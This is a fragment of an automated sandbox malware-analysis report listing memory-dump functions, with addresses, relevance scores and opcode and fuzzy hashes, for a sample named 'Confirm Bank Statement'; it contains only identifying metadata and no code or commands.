                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f1de872b24290fb88d6f68f801dcaacf2a112334cc422cbc767f54fdec05aff3
                                                                                              • Instruction ID: 8284b861db61b3a3432b89f9825e7d2443f1da68bd9d40ed079eb0e85ccb978e
                                                                                              • Opcode Fuzzy Hash: f1de872b24290fb88d6f68f801dcaacf2a112334cc422cbc767f54fdec05aff3
                                                                                              • Instruction Fuzzy Hash: ECC1B378E01218CFDB14DFA9C955B9DBBB2BF89300F2081A9D809AB355DB359E85CF50
                                                                                              Function 0287CDE0 Relevance: .3, Instructions: 268COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7bdffcc38e205cc32e0ef1b3807b855613791a41de4ac61eaf9b54e34462ab05
                                                                                              • Instruction ID: f588cd36d372bb47fa4d940852a1d84be760a2fdf93216321b067a16bb3556b7
                                                                                              • Opcode Fuzzy Hash: 7bdffcc38e205cc32e0ef1b3807b855613791a41de4ac61eaf9b54e34462ab05
                                                                                              • Instruction Fuzzy Hash: 1CC1A478E01218CFDB14DFA9C955B9DBBB2BF89300F2081A9D809AB355DB359E85CF50
                                                                                              Function 0287E928 Relevance: .3, Instructions: 268COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b66a4e9a4f024f91a944757242320c4ce256cabb28c5d21e44dd60621ad51933
                                                                                              • Instruction ID: 2d734b8821ce2ea9c793c0251056ab0fe3f7009485600f99bad92d01bef12d14
                                                                                              • Opcode Fuzzy Hash: b66a4e9a4f024f91a944757242320c4ce256cabb28c5d21e44dd60621ad51933
                                                                                              • Instruction Fuzzy Hash: 73C1B478E01218CFDB14DFA9C955B9DBBB2BF89300F1081A9D809AB355DB359E85CF50
                                                                                              Function 0287C530 Relevance: .3, Instructions: 268COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a7e59b387debc3b55d8cc9c3749ac2e621d0356616b4641bc8ca780dd113162d
                                                                                              • Instruction ID: 3d17c5aef0b6a0558dcd274dcd242666d8bd7210a29edcad88937881bffa9d8f
                                                                                              • Opcode Fuzzy Hash: a7e59b387debc3b55d8cc9c3749ac2e621d0356616b4641bc8ca780dd113162d
                                                                                              • Instruction Fuzzy Hash: E2C1C578E01218CFDB14DFA9C944B9DBBB2BF89301F1080AAD809AB355DB359E85CF50
                                                                                              Function 02870D48 Relevance: .3, Instructions: 268COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 85a0c24628474058206affe83006e0c5f26dfa0a92302e64d2434ddd20475d6a
                                                                                              • Instruction ID: b6a0941b00006755089a2ff160396987148dcdc242ed18004207740f88615d9d
                                                                                              • Opcode Fuzzy Hash: 85a0c24628474058206affe83006e0c5f26dfa0a92302e64d2434ddd20475d6a
                                                                                              • Instruction Fuzzy Hash: 2AC1B378E01218CFDB14DFA9C954B9DBBB2BF89300F1081A9D809AB395DB359E85CF50
                                                                                              Function 02877779 Relevance: 5.3, Strings: 4, Instructions: 270COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (oq$(oq$(oq$(oq
                                                                                              • API String ID: 0-3853041632
                                                                                              • Opcode ID: 540544ed6d7894f546249db5018fbf9efd44ba39e2d341f8d2f3506f312a5883
                                                                                              • Instruction ID: a77720a630e45f30fe7a2d5d15214161f55d6995e5f139e34b25ae7f85ceccf1
                                                                                              • Opcode Fuzzy Hash: 540544ed6d7894f546249db5018fbf9efd44ba39e2d341f8d2f3506f312a5883
                                                                                              • Instruction Fuzzy Hash: 0DC11A38A002099FDB24CF69D984AAEFBF2FF48318F158559E859EB261D731ED41CB50